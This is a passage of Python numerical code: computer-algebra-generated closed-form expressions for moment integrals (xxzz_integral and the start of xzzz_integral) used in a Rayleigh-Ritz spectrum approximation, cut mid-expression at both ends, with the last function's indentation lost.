                                    6 * (-1 + b) ** 6
                                    + a_conj ** 2 * (-1 + b) ** 4 * (-1 + 3 * b)
                                    + 5
                                    * a_conj ** 4
                                    * (-1 + b) ** 2
                                    * (11 + 16 * b + 21 * b ** 2)
                                )
                                + a ** 5
                                * (
                                    a_conj ** 7 * (29 + 51 * b)
                                    + a_conj ** 5 * (-32 + 26 * b + 30 * b ** 2)
                                    + 30 * a_conj ** 3 * (1 + 5 * b ** 3)
                                )
                                + a ** 3
                                * (
                                    a_conj * (-1 + b) ** 4 * (31 + 39 * b)
                                    + a_conj ** 3
                                    * (-1 + b) ** 2
                                    * (-7 + 4 * b + 15 * b ** 2)
                                    + 30 * a_conj ** 5 * (1 + 5 * b ** 3)
                                )
                                + a ** 4
                                * (
                                    10 * a_conj ** 6 * (2 + 7 * b + 12 * b ** 2)
                                    + 5
                                    * a_conj ** 2
                                    * (-1 + b) ** 2
                                    * (11 + 16 * b + 21 * b ** 2)
                                    + 6 * a_conj ** 4 * (-8 - 9 * b + 5 * b ** 3)
                                )
                            )
                        )
                        + 1
                        / (1 + x ** 2)
                        * (
                            18 * a ** 9 * a_conj ** 7
                            + 3 * a_conj ** 2 * (-1 + b) ** 7
                            + 2 * a * a_conj ** 3 * (-1 + b) ** 5 * (13 + 12 * b)
                            + a ** 8 * a_conj ** 6 * (101 + 3 * a_conj ** 2 + 99 * b)
                            + 2
                            * a ** 7
                            * a_conj ** 5
                            * (
                                29
                                + 9 * a_conj ** 4
                                + 167 * b
                                + 114 * b ** 2
                                + a_conj ** 2 * (62 + 6 * b)
                            )
                            + a ** 2
                            * (
                                3 * (-1 + b) ** 7
                                - a_conj ** 2 * (-1 + b) ** 5 * (-1 + 3 * b)
                                + a_conj ** 4
                                * (-1 + b) ** 3
                                * (103 + 154 * b + 93 * b ** 2)
                            )
                            + 2
                            * a ** 3
                            * a_conj
                            * (-1 + b)
                            * (
                                (-1 + b) ** 4 * (13 + 12 * b)
                                - 2
                                * a_conj ** 2
                                * (-1 + b) ** 2
                                * (-2 + b + 3 * b ** 2)
                                + 5
                                * a_conj ** 4
                                * (23 + 29 * b + 29 * b ** 2 + 21 * b ** 3)
                            )
                            + a ** 6
                            * (
                                a_conj ** 8 * (101 + 99 * b)
                                + a_conj ** 6 * (161 + 356 * b + 15 * b ** 2)
                                + 5
                                * a_conj ** 4
                                * (-35 + 37 * b + 73 * b ** 2 + 57 * b ** 3)
                            )
                            + a ** 4
                            * (
                                a_conj ** 2
                                * (-1 + b) ** 3
                                * (103 + 154 * b + 93 * b ** 2)
                                + 5
                                * a_conj ** 6
                                * (-35 + 37 * b + 73 * b ** 2 + 57 * b ** 3)
                                + a_conj ** 4
                                * (
                                    -91
                                    - 180 * b
                                    + 162 * b ** 2
                                    + 124 * b ** 3
                                    - 15 * b ** 4
                                )
                            )
                            + 2
                            * a ** 5
                            * a_conj ** 3
                            * (
                                2 * a_conj ** 2 * (-11 + 76 * b + 85 * b ** 2)
                                + a_conj ** 4 * (29 + 167 * b + 114 * b ** 2)
                                + 5 * (-23 - 6 * b + 8 * b ** 3 + 21 * b ** 4)
                            )
                        )
                        - 1
                        / (
                            b
                            * (
                                a ** 2 * a_conj ** 2
                                + 2 * a * a_conj * (b - x ** 2)
                                + (b + x ** 2) ** 2
                            )
                        )
                        * (
                            3
                            * a ** 2
                            * a_conj ** 2
                            * (a + a_conj) ** 2
                            * (
                                a ** 7 * a_conj ** 7
                                - a ** 6 * a_conj ** 6 * (-4 + 5 * b + x ** 2)
                                + a ** 5
                                * a_conj ** 5
                                * (6 - 35 * b ** 2 - 4 * x ** 2 - 2 * b * (-4 + x ** 2))
                                + a ** 4
                                * a_conj ** 4
                                * (
                                    4
                                    - 65 * b ** 3
                                    - 6 * x ** 2
                                    + b * (30 - 20 * x ** 2)
                                    + 5 * b ** 2 * (-4 + x ** 2)
                                )
                                + (-1 + b) ** 3
                                * b ** 2
                                * (5 * b ** 2 + 5 * x ** 2 + 3 * b * (1 + x ** 2))
                                + a ** 3
                                * a_conj ** 3
                                * (
                                    1
                                    - 45 * b ** 4
                                    - 4 * x ** 2
                                    + b ** 2 * (60 - 40 * x ** 2)
                                    + 20 * b ** 3 * (-4 + x ** 2)
                                    - 8 * b * (-2 + 3 * x ** 2)
                                )
                                + a ** 2
                                * a_conj ** 2
                                * (
                                    b ** 5
                                    - x ** 2
                                    + b ** 3 * (60 - 40 * x ** 2)
                                    + b ** 2 * (24 - 36 * x ** 2)
                                    + 25 * b ** 4 * (-4 + x ** 2)
                                    + b * (-1 + 4 * x ** 2)
                                )
                                + a
                                * a_conj
                                * (-1 + b)
                                * b
                                * (
                                    15 * b ** 4
                                    - 10 * x ** 2
                                    + b * (5 - 30 * x ** 2)
                                    - b ** 2 * (11 + 6 * x ** 2)
                                    + b ** 3 * (-41 + 14 * x ** 2)
                                )
                            )
                        )
                    )
                )
                + 1
                / (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (9 / 2)
                * (
                    12
                    * (1 + a * a_conj + b)
                    * (
                        a ** 4 * a_conj ** 2 * (-10 + 3 * a_conj ** 2)
                        - 10 * a_conj ** 2 * (1 + 5 * b + b ** 2)
                        + 3 * (-1 + b) ** 2 * (1 + 8 * b + b ** 2)
                        - 4
                        * a
                        * a_conj
                        * (
                            2
                            + 13 * b
                            - 7 * b ** 2
                            - 3 * b ** 3
                            + 5 * a_conj ** 2 * (1 + b)
                        )
                        + 4
                        * a ** 3
                        * (-5 * a_conj * (1 + b) + a_conj ** 3 * (-2 + 3 * b))
                        - 2
                        * a ** 2
                        * (
                            5 * a_conj ** 4
                            + 5 * (1 + 5 * b + b ** 2)
                            - a_conj ** 2 * (-11 + b + 9 * b ** 2)
                        )
                    )
                    * np.log(
                        a * a_conj
                        - b
                        + (a * a_conj + b) ** 2
                        + np.sqrt((a * a_conj + b) ** 2)
                        * np.sqrt(1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2)
                    )
                )
                + 1
                / (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (9 / 2)
                * (
                    12
                    * (1 + a * a_conj + b)
                    * (
                        a ** 4 * a_conj ** 2 * (-10 + 3 * a_conj ** 2)
                        - 10 * a_conj ** 2 * (1 + 5 * b + b ** 2)
                        + 3 * (-1 + b) ** 2 * (1 + 8 * b + b ** 2)
                        - 4
                        * a
                        * a_conj
                        * (
                            2
                            + 13 * b
                            - 7 * b ** 2
                            - 3 * b ** 3
                            + 5 * a_conj ** 2 * (1 + b)
                        )
                        + 4
                        * a ** 3
                        * (-5 * a_conj * (1 + b) + a_conj ** 3 * (-2 + 3 * b))
                        - 2
                        * a ** 2
                        * (
                            5 * a_conj ** 4
                            + 5 * (1 + 5 * b + b ** 2)
                            - a_conj ** 2 * (-11 + b + 9 * b ** 2)
                        )
                    )
                    * np.log(1 + x ** 2)
                )
                - 1
                / (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (9 / 2)
                * (
                    12
                    * (1 + a * a_conj + b)
                    * (
                        a ** 4 * a_conj ** 2 * (-10 + 3 * a_conj ** 2)
                        - 10 * a_conj ** 2 * (1 + 5 * b + b ** 2)
                        + 3 * (-1 + b) ** 2 * (1 + 8 * b + b ** 2)
                        - 4
                        * a
                        * a_conj
                        * (
                            2
                            + 13 * b
                            - 7 * b ** 2
                            - 3 * b ** 3
                            + 5 * a_conj ** 2 * (1 + b)
                        )
                        + 4
                        * a ** 3
                        * (-5 * a_conj * (1 + b) + a_conj ** 3 * (-2 + 3 * b))
                        - 2
                        * a ** 2
                        * (
                            5 * a_conj ** 4
                            + 5 * (1 + 5 * b + b ** 2)
                            - a_conj ** 2 * (-11 + b + 9 * b ** 2)
                        )
                    )
                    * np.log(
                        a * a_conj
                        - b
                        + (a * a_conj + b) ** 2
                        - x ** 2
                        - a * a_conj * x ** 2
                        + b * x ** 2
                        + np.sqrt(1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2)
                        * np.sqrt(
                            a ** 2 * a_conj ** 2
                            + 2 * a * a_conj * (b - x ** 2)
                            + (b + x ** 2) ** 2
                        )
                    )
                )
            )
        )
        # 4 / 1j == -4j, so the overall prefactor here is -4j * pi * c.
        return 4 / 1j * np.pi * c * ret
    # Degenerate branch: a ~ 0 (|conj(a)| below tolerance) -- the closed
    # form reduces to zero.
    if abs(a_conj) < 0.00000001:
        return 0
def xxzz_integral(a, b, c, x):
    """
    Function involved in computing the a_matrix (Rayleigh-Ritz approximation
    of the spectrum): closed-form value of the <x x z z>-type moment integral.

    The body is one enormous machine-generated algebraic expression
    (presumably exported from a computer-algebra system) -- do not edit the
    formula by hand; regenerate it instead.

    @param a: complex parameter; its conjugate ``np.conj(a)`` drives both the
        branch selection and the formula
    @param b: scalar parameter of the integrand (assumed real -- TODO confirm;
        the ``(b - 1) ** 2`` branch tests below only make sense for real b)
    @param c: overall multiplicative constant applied to the result
    @param x: cut-off / integration variable; enters only through powers of
        ``x ** 2``
    @return: ``2 * np.pi * c * ret`` in the generic branch; ``8 * np.pi * c *
        ret`` in the two degenerate (``a ~ 0``) branches
    """
    a_conj = np.conj(a)  # conjugate of a; branching is on its magnitude
    # Generic branch: a is numerically non-zero (tolerance 1e-8).
    if abs(a_conj) >= 0.00000001:
        ret = (
            1
            / 6
            * (
                1 / a ** 2
                + 1 / a_conj ** 2
                - 1
                / (
                    a ** 2
                    * a_conj ** 2
                    * b
                    * (a ** 2 * a_conj ** 2 + (-1 + b) ** 2 + 2 * a * a_conj * (1 + b))
                    ** 4
                )
                * (
                    np.sqrt((a * a_conj + b) ** 2)
                    * (
                        a ** 9 * a_conj ** 7 * (-3 + b)
                        - a ** 8 * a_conj ** 6 * (6 + 6 * a_conj ** 2 + b - 7 * b ** 2)
                        + a_conj ** 2 * (-1 + b) ** 5 * b * (3 + b ** 2)
                        + a
                        * a_conj ** 3
                        * (-1 + b) ** 3
                        * (3 + 54 * b + 38 * b ** 2 + 10 * b ** 3 + 7 * b ** 4)
                        + a ** 7
                        * a_conj ** 5
                        * (
                            3
                            + a_conj ** 4 * (-3 + b)
                            - 239 * b
                            + 35 * b ** 2
                            + 21 * b ** 3
                            + 4 * a_conj ** 2 * (-3 + 4 * b)
                        )
                        + a ** 6
                        * a_conj ** 4
                        * (
                            12
                            - 73 * b
                            - 691 * b ** 2
                            + 85 * b ** 3
                            + 35 * b ** 4
                            + a_conj ** 4 * (-6 - b + 7 * b ** 2)
                            + 2 * a_conj ** 2 * (3 - 220 * b + 85 * b ** 2)
                        )
                        + a ** 5
                        * a_conj ** 3
                        * (
                            3
                            + 523 * b
                            - 766 * b ** 2
                            - 686 * b ** 3
                            + 75 * b ** 4
                            + 35 * b ** 5
                            + a_conj ** 4 * (3 - 239 * b + 35 * b ** 2 + 21 * b ** 3)
                            + 8
                            * a_conj ** 2
                            * (3 - 26 * b - 147 * b ** 2 + 50 * b ** 3)
                        )
                        + a ** 4
                        * a_conj ** 2
                        * (
                            -6
                            + 317 * b
                            + 565 * b ** 2
                            - 702 * b ** 3
                            - 212 * b ** 4
                            + 17 * b ** 5
                            + 21 * b ** 6
                            + a_conj ** 4
                            * (12 - 73 * b - 691 * b ** 2 + 85 * b ** 3 + 35 * b ** 4)
                            + 2
                            * a_conj ** 2
                            * (3 + 424 * b - 730 * b ** 2 - 504 * b ** 3 + 215 * b ** 4)
                        )
                        + a ** 2
                        * (-1 + b)
                        * (
                            (-1 + b) ** 4 * b * (3 + b ** 2)
                            + 2
                            * a_conj ** 2
                            * (-1 + b) ** 2
                            * (3 + 69 * b + 105 * b ** 2 + 23 * b ** 3)
                            + a_conj ** 4
                            * (
                                6
                                - 311 * b
                                - 876 * b ** 2
                                - 174 * b ** 3
                                + 38 * b ** 4
                                + 21 * b ** 5
                            )
                        )
                        + a ** 3
                        * (
                            a_conj
                            * (-1 + b) ** 3
                            * (3 + 54 * b + 38 * b ** 2 + 10 * b ** 3 + 7 * b ** 4)
                            + a_conj ** 5
                            * (
                                3
                                + 523 * b
                                - 766 * b ** 2
                                - 686 * b ** 3
                                + 75 * b ** 4
                                + 35 * b ** 5
                            )
                            + 4
                            * a_conj ** 3
                            * (
                                -3
                                + 120 * b
                                + 274 * b ** 2
                                - 400 * b ** 3
                                - 47 * b ** 4
                                + 56 * b ** 5
                            )
                        )
                    )
                )
                - 4
                * (a ** 2 + a_conj ** 2)
                / (a ** 2 * a_conj ** 2 * (1 + x ** 2) ** 3)
                + 6
                * (a ** 2 + a_conj ** 2)
                / (a ** 2 * a_conj ** 2 * (1 + x ** 2) ** 2)
                - 3 * (a ** 2 + a_conj ** 2) / (a ** 2 * a_conj ** 2 * (1 + x ** 2))
                + 1
                / (
                    a ** 2
                    * a_conj ** 2
                    * (a ** 2 * a_conj ** 2 + (-1 + b) ** 2 + 2 * a * a_conj * (1 + b))
                    ** 4
                )
                * (
                    np.sqrt(
                        (a * a_conj + b) ** 2
                        - 2 * a * a_conj * x ** 2
                        + 2 * b * x ** 2
                        + x ** 4
                    )
                    * (
                        4
                        * (
                            a ** 2 * a_conj ** 2
                            + (-1 + b) ** 2
                            + 2 * a * a_conj * (1 + b)
                        )
                        ** 2
                        * (
                            a ** 5 * a_conj ** 3
                            + a_conj ** 2 * (-1 + b) ** 3
                            + 3 * a ** 4 * a_conj ** 2 * (1 + b)
                            + 3 * a * a_conj ** 3 * (-1 + b ** 2)
                            + a ** 3
                            * a_conj
                            * (-3 + 4 * a_conj ** 2 + a_conj ** 4 + 3 * b ** 2)
                            + a ** 2
                            * (
                                4 * a_conj ** 2 * (-1 + b)
                                + (-1 + b) ** 3
                                + 3 * a_conj ** 4 * (1 + b)
                            )
                        )
                        / (1 + x ** 2) ** 3
                        - 1
                        / (1 + x ** 2) ** 2
                        * (
                            2
                            * (
                                a ** 2 * a_conj ** 2
                                + (-1 + b) ** 2
                                + 2 * a * a_conj * (1 + b)
                            )
                            * (
                                3 * a ** 7 * a_conj ** 5
                                + a_conj ** 2 * (-1 + b) ** 4 * (-1 + 3 * b)
                                + a ** 6 * a_conj ** 4 * (13 + 15 * b)
                                + a
                                * a_conj ** 3
                                * (-1 + b) ** 2
                                * (-7 + 4 * b + 15 * b ** 2)
                                + a ** 5
                                * a_conj ** 3
                                * (
                                    -32
                                    + 24 * a_conj ** 2
                                    + 3 * a_conj ** 4
                                    + 26 * b
                                    + 30 * b ** 2
                                )
                                + a ** 3
                                * (
                                    24 * a_conj ** 3 * (-2 - 3 * b + 3 * b ** 2)
                                    + a_conj
                                    * (-1 + b) ** 2
                                    * (-7 + 4 * b + 15 * b ** 2)
                                    + a_conj ** 5 * (-32 + 26 * b + 30 * b ** 2)
                                )
                                + a ** 4
                                * (
                                    8 * a_conj ** 4 * (-4 + 9 * b)
                                    + a_conj ** 6 * (13 + 15 * b)
                                    + 6 * a_conj ** 2 * (-8 - 9 * b + 5 * b ** 3)
                                )
                                + a ** 2
                                * (
                                    (-1 + b) ** 4 * (-1 + 3 * b)
                                    + 8 * a_conj ** 2 * (-1 + b) ** 2 * (1 + 3 * b)
                                    + 6 * a_conj ** 4 * (-8 - 9 * b + 5 * b ** 3)
                                )
                            )
                        )
                        + 1
                        / (1 + x ** 2)
                        * (
                            3 * a ** 9 * a_conj ** 7
                            + 3 * a ** 8 * a_conj ** 6 * (5 + 7 * b)
                            + a_conj ** 2 * (-1 + b) ** 5 * (1 + 3 * b ** 2)
                            + a ** 7
                            * a_conj ** 5
                            * (
                                -203
                                + 60 * a_conj ** 2
                                + 3 * a_conj ** 4
                                + 60 * b
                                + 63 * b ** 2
                            )
                            + a
                            * a_conj ** 3
                            * (-1 + b) ** 3
                            * (5 - 13 * b + 3 * b ** 2 + 21 * b ** 3)
                            + a ** 6
                            * a_conj ** 4
                            * (
                                -295
                                - 661 * b
                                + 75 * b ** 2
                                + 105 * b ** 3
                                + 3 * a_conj ** 4 * (5 + 7 * b)
                                + 12 * a_conj ** 2 * (-21 + 25 * b)
                            )
                            + a ** 5
                            * a_conj ** 3
                            * (
                                61
                                - 632 * b
                                - 734 * b ** 2
                                + 105 * b ** 4
                                + a_conj ** 4 * (-203 + 60 * b + 63 * b ** 2)
                                + 8 * a_conj ** 2 * (-49 - 102 * b + 75 * b ** 2)
                            )
                            + a ** 4
                            * a_conj ** 2
                            * (
                                137
                                + 411 * b
                                - 270 * b ** 2
                                - 266 * b ** 3
                                - 75 * b ** 4
                                + 63 * b ** 5
                                + 8
                                * a_conj ** 2
                                * (23 - 129 * b - 117 * b ** 2 + 75 * b ** 3)
                                + a_conj ** 4
                                * (-295 - 661 * b + 75 * b ** 2 + 105 * b ** 3)
                            )
                            + a ** 2
                            * (-1 + b)
                            * (
                                (-1 + b) ** 4 * (1 + 3 * b ** 2)
                                + 4
                                * a_conj ** 2
                                * (-1 + b) ** 2
                                * (7 + 30 * b + 15 * b ** 2)
                                + a_conj ** 4
                                * (
                                    -137
                                    - 548 * b
                                    - 278 * b ** 2
                                    - 12 * b ** 3
                                    + 63 * b ** 4
                                )
                            )
                            + a ** 3
                            * (
                                a_conj
                                * (-1 + b) ** 3
                                * (5 - 13 * b + 3 * b ** 2 + 21 * b ** 3)
                                + 4
                                * a_conj ** 3
                                * (
                                    59
                                    + 172 * b
                                    - 198 * b ** 2
                                    - 108 * b ** 3
                                    + 75 * b ** 4
                                )
                                + a_conj ** 5
                                * (61 - 632 * b - 734 * b ** 2 + 105 * b ** 4)
                            )
                        )
                        - 1
                        / (
                            b
                            * (
                                a ** 2 * a_conj ** 2
                                + 2 * a * a_conj * (b - x ** 2)
                                + (b + x ** 2) ** 2
                            )
                        )
                        * (
                            3
                            * a
                            * a_conj
                            * (a + a_conj) ** 2
                            * (
                                a ** 8 * a_conj ** 8
                                + a ** 7 * a_conj ** 7 * (2 + 4 * b - x ** 2)
                                - (-1 + b) ** 3
                                * b
                                * (1 + b)
                                * (
                                    b
                                    + 3 * b ** 3
                                    + 3 * x ** 2
                                    + 12 * b * x ** 2
                                    + b ** 2 * (12 + x ** 2)
                                )
                                + a ** 5
                                * a_conj ** 5
                                * (
                                    -4
                                    - 28 * b ** 3
                                    + x ** 2
                                    + b * (2 - 20 * x ** 2)
                                    - 7 * b ** 2 * (-22 + 3 * x ** 2)
                                )
                                - a ** 4
                                * a_conj ** 4
                                * (
                                    1
                                    + 70 * b ** 4
                                    - 4 * x ** 2
                                    + b * (84 - 41 * x ** 2)
                                    + 35 * b ** 2 * (-3 + 2 * x ** 2)
                                    + 5 * b ** 3 * (-54 + 7 * x ** 2)
                                )
                                - a ** 6
                                * a_conj ** 6
                                * (1 + 2 * x ** 2 + b * (-38 + 7 * x ** 2))
                                - a
                                * a_conj
                                * (-1 + b)
                                * (
                                    20 * b ** 6
                                    - x ** 2
                                    + b ** 2 * (24 - 122 * x ** 2)
                                    + b * (2 - 29 * x ** 2)
                                    - 14 * b ** 3 * (4 + 3 * x ** 2)
                                    + b ** 5 * (22 + 7 * x ** 2)
                                    + b ** 4 * (-140 + 59 * x ** 2)
                                )
                                + a ** 3
                                * a_conj ** 3
                                * (
                                    2
                                    - 84 * b ** 5
                                    + x ** 2
                                    + 40 * b * (-1 + 2 * x ** 2)
                                    - 5 * b ** 4 * (-46 + 7 * x ** 2)
                                    - 4 * b ** 3 * (-79 + 30 * x ** 2)
                                    + 2 * b ** 2 * (-116 + 69 * x ** 2)
                                )
                                + a ** 2
                                * a_conj ** 2
                                * (
                                    1
                                    - 56 * b ** 6
                                    - 2 * x ** 2
                                    + b ** 4 * (353 - 110 * x ** 2)
                                    + b ** 5 * (82 - 21 * x ** 2)
                                    + b * (14 - 5 * x ** 2)
                                    + 2 * b ** 2 * (-49 + 76 * x ** 2)
                                    + 2 * b ** 3 * (-116 + 89 * x ** 2)
                                )
                            )
                        )
                    )
                )
                + 1
                / (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (9 / 2)
                * (
                    12
                    * (1 + a * a_conj + b)
                    * (
                        a ** 6 * a_conj ** 4 * (-9 + a_conj ** 2)
                        + (-1 + b) ** 4 * (1 + 6 * b + b ** 2)
                        - 3 * a_conj ** 2 * (-1 + b) ** 2 * (3 + 14 * b + 3 * b ** 2)
                        + 2
                        * a
                        * a_conj
                        * (-1 + b) ** 2
                        * (-8 - 45 * b + 2 * b ** 2 + 3 * b ** 3)
                        - 4 * a * a_conj ** 3 * (-1 - 29 * b + 11 * b ** 2 + 9 * b ** 3)
                        + 2
                        * a ** 5
                        * a_conj ** 3
                        * (2 - 18 * b + a_conj ** 2 * (-8 + 3 * b))
                        + a ** 4
                        * a_conj ** 2
                        * (
                            26
                            - 9 * a_conj ** 4
                            - 16 * b
                            - 54 * b ** 2
                            + a_conj ** 2 * (7 - 62 * b + 15 * b ** 2)
                        )
                        - 4
                        * a ** 3
                        * a_conj
                        * (
                            -1
                            - 29 * b
                            + 11 * b ** 2
                            + 9 * b ** 3
                            + a_conj ** 4 * (-1 + 9 * b)
                            + a_conj ** 2 * (-12 + 11 * b + 22 * b ** 2 - 5 * b ** 3)
                        )
                        - a ** 2
                        * (
                            3 * (-1 + b) ** 2 * (3 + 14 * b + 3 * b ** 2)
                            + 2 * a_conj ** 4 * (-13 + 8 * b + 27 * b ** 2)
                            + a_conj ** 2
                            * (-7 - 204 * b + 126 * b ** 2 + 52 * b ** 3 - 15 * b ** 4)
                        )
                    )
                    * np.arctanh(
                        (
                            a ** 2 * a_conj ** 2
                            + (-1 + b) * b
                            + a * (a_conj + 2 * a_conj * b)
                        )
                        / (
                            np.sqrt((a * a_conj + b) ** 2)
                            * np.sqrt(
                                a ** 2 * a_conj ** 2
                                + (-1 + b) ** 2
                                + 2 * a * a_conj * (1 + b)
                            )
                        )
                    )
                )
                - 1
                / (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (9 / 2)
                * (
                    12
                    * (1 + a * a_conj + b)
                    * (
                        a ** 6 * a_conj ** 4 * (-9 + a_conj ** 2)
                        + (-1 + b) ** 4 * (1 + 6 * b + b ** 2)
                        - 3 * a_conj ** 2 * (-1 + b) ** 2 * (3 + 14 * b + 3 * b ** 2)
                        + 2
                        * a
                        * a_conj
                        * (-1 + b) ** 2
                        * (-8 - 45 * b + 2 * b ** 2 + 3 * b ** 3)
                        - 4 * a * a_conj ** 3 * (-1 - 29 * b + 11 * b ** 2 + 9 * b ** 3)
                        + 2
                        * a ** 5
                        * a_conj ** 3
                        * (2 - 18 * b + a_conj ** 2 * (-8 + 3 * b))
                        + a ** 4
                        * a_conj ** 2
                        * (
                            26
                            - 9 * a_conj ** 4
                            - 16 * b
                            - 54 * b ** 2
                            + a_conj ** 2 * (7 - 62 * b + 15 * b ** 2)
                        )
                        - 4
                        * a ** 3
                        * a_conj
                        * (
                            -1
                            - 29 * b
                            + 11 * b ** 2
                            + 9 * b ** 3
                            + a_conj ** 4 * (-1 + 9 * b)
                            + a_conj ** 2 * (-12 + 11 * b + 22 * b ** 2 - 5 * b ** 3)
                        )
                        - a ** 2
                        * (
                            3 * (-1 + b) ** 2 * (3 + 14 * b + 3 * b ** 2)
                            + 2 * a_conj ** 4 * (-13 + 8 * b + 27 * b ** 2)
                            + a_conj ** 2
                            * (-7 - 204 * b + 126 * b ** 2 + 52 * b ** 3 - 15 * b ** 4)
                        )
                    )
                    * np.arctanh(
                        (
                            a ** 2 * a_conj ** 2
                            + a * a_conj * (1 + 2 * b - x ** 2)
                            + (-1 + b) * (b + x ** 2)
                        )
                        / (
                            np.sqrt(
                                a ** 2 * a_conj ** 2
                                + (-1 + b) ** 2
                                + 2 * a * a_conj * (1 + b)
                            )
                            * np.sqrt(
                                a ** 2 * a_conj ** 2
                                + 2 * a * a_conj * (b - x ** 2)
                                + (b + x ** 2) ** 2
                            )
                        )
                    )
                )
            )
        )
        return 2 * np.pi * c * ret
    # Degenerate branch: a ~ 0 but b away from 1.
    # NOTE(review): this test uses (b - 1) ** 2 where the sibling integral
    # earlier in the file uses abs(b - 1) ** 2 -- equivalent for real b only;
    # confirm b is always real.
    if abs(a_conj) < 0.00000001 and (b - 1) ** 2 >= 0.00000001:
        ret = (
            1
            / (6 * (-1 + b) ** 5)
            * (
                -4 * (-1 + b) ** 3
                + 12 * (-1 + b) ** 2 * b
                - 3 * (-1 + b) * (1 + b) ** 2
                - 3 * (-1 + b) * (1 + b) * (1 + 5 * b)
                + 4 * (-1 + b) ** 3 / (1 + x ** 2) ** 3
                - 12 * (-1 + b) ** 2 * b / (1 + x ** 2) ** 2
                + 3 * (-1 + b) * (1 + b) * (1 + 5 * b) / (1 + x ** 2)
                + 3 * (-1 + b) * b * (1 + b) ** 2 / (b + x ** 2)
                + 3 * (1 + 7 * b + 7 * b ** 2 + b ** 3) * np.log(b)
                + 3 * (1 + 7 * b + 7 * b ** 2 + b ** 3) * np.log(1 + x ** 2)
                - 3 * (1 + 7 * b + 7 * b ** 2 + b ** 3) * np.log(b + x ** 2)
            )
        )
        return 8 * np.pi * c * ret
    # Degenerate branch: a ~ 0 and b ~ 1 -- presumably the b -> 1 limit of
    # the branch above (TODO confirm).
    if abs(a_conj) < 0.00000001 and (b - 1) ** 2 < 0.00000001:
        ret = (
            x ** 4 * (15 - 5 * x ** 2 + 5 * x ** 4 + x ** 6) / (60 * (1 + x ** 2) ** 5)
        )
        return 8 * np.pi * c * ret
def xzzz_integral(a, b, c, x):
"""
function involved in computing the a_matrix (Rayleigh Ritz approx of the spectrum)
@param a:
@param b:
@param c:
@param x:
@return:
"""
a_conj = np.conj(a)
if abs(a_conj) >= 0.00000001:
ret = (
1
/ (
6
* a
* a_conj
* b
* (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (9 / 2)
)
* (
(a + a_conj)
* (
-54
* (
a ** 2 * a_conj ** 2
+ 2 * a * a_conj * (1 - 5 * b)
+ (-1 + b) ** 2
)
* np.sqrt((a * a_conj + b) ** 2)
* (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (5 / 2)
- 8
* (
3 * a ** 2 * a_conj ** 2
+ a * a_conj * (6 - 22 * b)
+ 3 * (-1 + b) ** 2
)
* np.sqrt((a * a_conj + b) ** 2)
* (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (5 / 2)
+ 3
* (a * a_conj - b)
* (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (9 / 2)
/ np.sqrt((a * a_conj + b) ** 2)
- 3
* (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (7 / 2)
* (
a ** 2 * a_conj ** 2
+ (-1 + b) * b
+ a * (a_conj - 6 * a_conj * b)
)
/ np.sqrt((a * a_conj + b) ** 2)
- 8
* np.sqrt((a * a_conj + b) ** 2)
* (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (3 / 2)
* (
3 * a ** 3 * a_conj ** 3
+ a ** 2 * a_conj ** 2 * (9 - 67 * b)
- 3 * (-1 + b) ** 3
+ a * a_conj * (9 - 76 * b + 67 * b ** 2)
)
- 8
* np.sqrt((a * a_conj + b) ** 2)
* np.sqrt(1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2)
* (
3 * a ** 4 * a_conj ** 4
+ 3 * (-1 + b) ** 4
- 2 * a ** 3 * a_conj ** 3 * (-6 + 89 * b)
- 2 * a * a_conj * (-1 + b) ** 2 * (-6 + 89 * b)
+ 2 * a ** 2 * a_conj ** 2 * (9 - 184 * b + 239 * b ** 2)
)
- 3
* (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (9 / 2)
* (a * a_conj - b - x ** 2)
/ np.sqrt(
(a * a_conj + b) ** 2 - 2 * (a * a_conj - b) * x ** 2 + x ** 4
)
+ 8
* (
3 * a ** 2 * a_conj ** 2
+ a * a_conj * (6 - 22 * b)
+ 3 * (-1 + b) ** 2
)
* (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (5 / 2)
* np.sqrt(
(a * a_conj + b) ** 2 - 2 * (a * a_conj - b) * x ** 2 + x ** 4
)
/ (1 + x ** 2) ** 3
+ 8
* (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (3 / 2)
* (
3 * a ** 3 * a_conj ** 3
+ a ** 2 * a_conj ** 2 * (9 - 67 * b)
- 3 * (-1 + b) ** 3
+ a * a_conj * (9 - 76 * b + 67 * b ** 2)
)
* np.sqrt(
(a * a_conj + b) ** 2 - 2 * (a * a_conj - b) * x ** 2 + x ** 4
)
/ (1 + x ** 2) ** 2
+ 54
* (
a ** 2 * a_conj ** 2
+ 2 * a * a_conj * (1 - 5 * b)
+ (-1 + b) ** 2
)
* (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (5 / 2)
* np.sqrt(
(a * a_conj + b) ** 2 - 2 * (a * a_conj - b) * x ** 2 + x ** 4
)
/ (1 + x ** 2)
+ 8
* np.sqrt(1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2)
* (
3 * a ** 4 * a_conj ** 4
+ 3 * (-1 + b) ** 4
- 2 * a ** 3 * a_conj ** 3 * (-6 + 89 * b)
- 2 * a * a_conj * (-1 + b) ** 2 * (-6 + 89 * b)
+ 2 * a ** 2 * a_conj ** 2 * (9 - 184 * b + 239 * b ** 2)
)
* np.sqrt(
(a * a_conj + b) ** 2 - 2 * (a * a_conj - b) * x ** 2 + x ** 4
)
/ (1 + x ** 2)
+ 21
* (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (7 / 2)
* (
a ** 2 * a_conj ** 2
+ b ** 2
- x ** 2
+ b * (-1 + x ** 2)
